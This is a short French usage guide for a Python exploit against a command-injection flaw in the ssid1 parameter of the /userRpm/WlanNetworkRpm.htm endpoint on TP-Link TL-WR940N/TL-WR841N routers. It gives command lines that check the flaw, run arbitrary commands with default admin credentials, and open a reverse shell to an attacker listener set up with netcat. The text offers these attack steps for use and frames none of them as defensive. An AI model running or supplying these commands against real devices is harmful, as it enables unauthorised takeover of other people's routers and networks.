
Exploit Python pour la vulnérabilité d'injection de commandes TP-Link TL-WR940N/TL-WR841N
Vérification de base de la vulnérabilité :
python tplink_exploit.py -t 192.168.1.1 -u admin -p admin
Exécuter une commande personnalisée :
python tplink_exploit.py -t 192.168.1.1 -u admin -p admin -c "your_command_here"
Reverse Shell (configurez d'abord un écouteur avec nc -lvnp 4444) :
python tplink_exploit.py -t 192.168.1.1 -u admin -p admin --lhost YOUR_IP --lport 4444
Remarques importantes :
La vulnérabilité existe en raison d'une désinfection incorrecte des entrées dans le paramètre ssid1 du point de terminaison /userRpm/WlanNetworkRpm.htm, permettant une injection de commande via des requêtes spécialement conçues.